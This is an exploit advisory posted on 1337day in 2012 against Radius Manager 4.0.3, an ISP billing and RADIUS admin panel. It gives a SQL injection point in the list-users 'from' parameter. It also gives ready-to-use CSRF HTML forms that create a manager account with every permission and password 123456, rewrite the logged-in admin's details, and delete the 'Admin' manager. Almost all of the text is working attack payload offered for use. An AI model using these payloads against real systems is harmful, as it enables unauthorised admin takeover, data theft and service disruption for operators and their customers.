facebook facebook twitter rss

Radius Manager V4.0.3 Sql injection/CSRF Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 01-06-2012
Radius Manager V4.0.3 Sql injection/CSRF Vulnerabilties
=======================================================================

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://dmasoftlab.com/cont/home
.:. Tested On Demo : http://radmandemo.dmasoftlab.com/admin.php
#######################################################################

===[ Exploit ]===

Sql Injection
=============

Go To Users > List Users > Page 2 or 3 or ......

http://SITE/admin.php?cont=list_users&ordercol=staticipcm&ordertype=ASC&lastorder=staticipcm&username=&listacctype=91&srvtype=&status=-1&acctinfo=-1&groupid=&owner=&srvid=&mac=&maccm=&staticip=&firstname=&lastname=&company=&address=&city=&zip=&country=&state=&phone=&mobile=&email=&comment=&from=50[sql]


Multiple CSRF
==============

1:Add Manager
==============

<form method="POST" name="form0" action="http://SITE/admin.php?cont=store_manager">
<input type="hidden" name="managername" value="Admin"/>
<input type="hidden" name="enablemanager" value="1"/>
<input type="hidden" name="password1" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="firstname" value="Mohamad"/>
<input type="hidden" name="lastname" value="Hussien"/>
<input type="hidden" name="company" value="....."/>
<input type="hidden" name="address" value="....."/>
<input type="hidden" name="city" value="....."/>
<input type="hidden" name="zip" value="....."/>
<input type="hidden" name="country" value="....."/>
<input type="hidden" name="state" value="....."/>
<input type="hidden" name="phone" value="....."/>
<input type="hidden" name="mobile" value="....."/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="vatid" value="....."/>
<input type="hidden" name="comment" value="....."/>
<input type="hidden" name="perm_listusers" value="1"/>
<input type="hidden" name="perm_listmanagers" value="1"/>
<input type="hidden" name="perm_listservices" value="1"/>
<input type="hidden" name="perm_createusers" value="1"/>
<input type="hidden" name="perm_createmanagers" value="1"/>
<input type="hidden" name="perm_createservices" value="1"/>
<input type="hidden" name="perm_editusers" value="1"/>
<input type="hidden" name="perm_editmanagers" value="1"/>
<input type="hidden" name="perm_editservices" value="1"/>
<input type="hidden" name="perm_edituserspriv" value="1"/>
<input type="hidden" name="perm_deletemanagers" value="1"/>
<input type="hidden" name="perm_deleteservices" value="1"/>
<input type="hidden" name="perm_deleteusers" value="1"/>
<input type="hidden" name="perm_addcredits" value="1"/>
<input type="hidden" name="perm_listinvoices" value="1"/>
<input type="hidden" name="perm_allusers" value="1"/>
<input type="hidden" name="perm_negbalance" value="1"/>
<input type="hidden" name="perm_listallinvoices" value="1"/>
<input type="hidden" name="perm_listonlineusers" value="1"/>
<input type="hidden" name="perm_allowdiscount" value="1"/>
<input type="hidden" name="perm_showinvtotals" value="1"/>
<input type="hidden" name="perm_logout" value="1"/>
<input type="hidden" name="perm_enwriteoff" value="1"/>
<input type="hidden" name="perm_editinvoice" value="1"/>
<input type="hidden" name="perm_cardsys" value="1"/>
<input type="hidden" name="perm_cts" value="1"/>
<input type="hidden" name="perm_trafficreport" value="1"/>
<input type="hidden" name="perm_accessap" value="1"/>
<input type="hidden" name="Submit" value="Add manager"/>
</form>

</body>
</html>



2:Edit Account Manager
======================

<form method="POST" name="form0" action="http://SITE/admin.php?cont=update_manager&managername=Admin">
<input type="hidden" name="enablemanager" value="1"/>
<input type="hidden" name="firstname" value="Mohamad"/>
<input type="hidden" name="lastname" value="Hussien"/>
<input type="hidden" name="company" value="....."/>
<input type="hidden" name="address" value="....."/>
<input type="hidden" name="city" value="....."/>
<input type="hidden" name="zip" value="....."/>
<input type="hidden" name="country" value="....."/>
<input type="hidden" name="state" value="....."/>
<input type="hidden" name="phone" value="....."/>
<input type="hidden" name="mobile" value="....."/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="vatid" value="....."/>
<input type="hidden" name="comment" value="....."/>
<input type="hidden" name="perm_listusers" value="1"/>
<input type="hidden" name="perm_listmanagers" value="1"/>
<input type="hidden" name="perm_listservices" value="1"/>
<input type="hidden" name="perm_createusers" value="1"/>
<input type="hidden" name="perm_createmanagers" value="1"/>
<input type="hidden" name="perm_createservices" value="1"/>
<input type="hidden" name="perm_editusers" value="1"/>
<input type="hidden" name="perm_editmanagers" value="1"/>
<input type="hidden" name="perm_editservices" value="1"/>
<input type="hidden" name="perm_edituserspriv" value="1"/>
<input type="hidden" name="perm_deletemanagers" value="1"/>
<input type="hidden" name="perm_deleteservices" value="1"/>
<input type="hidden" name="perm_deleteusers" value="1"/>
<input type="hidden" name="perm_addcredits" value="1"/>
<input type="hidden" name="perm_listinvoices" value="1"/>
<input type="hidden" name="perm_allusers" value="1"/>
<input type="hidden" name="perm_negbalance" value="1"/>
<input type="hidden" name="perm_listallinvoices" value="1"/>
<input type="hidden" name="perm_listonlineusers" value="1"/>
<input type="hidden" name="perm_allowdiscount" value="1"/>
<input type="hidden" name="perm_showinvtotals" value="1"/>
<input type="hidden" name="perm_logout" value="1"/>
<input type="hidden" name="perm_enwriteoff" value="1"/>
<input type="hidden" name="perm_editinvoice" value="1"/>
<input type="hidden" name="perm_cardsys" value="1"/>
<input type="hidden" name="perm_cts" value="1"/>
<input type="hidden" name="perm_trafficreport" value="1"/>
<input type="hidden" name="perm_accessap" value="1"/>
<input type="hidden" name="Submit" value="Update manager"/>
</form>

</body>
</html>


action="http://SITE/admin.php?cont=update_manager&managername=Admin"> [Admin is login manager]



3:Delete Manager
=================

<form method="POST" name="form0" action="http://SITE/admin.php?cont=list_managers_action">
<input type="hidden" name="list[]" value="Admin"/>
<input type="hidden" name="action" value="2"/>
</form>

</body>
</html>

#######################################################################


# 1337day.com [2012-06-01]

Like us on Facebook :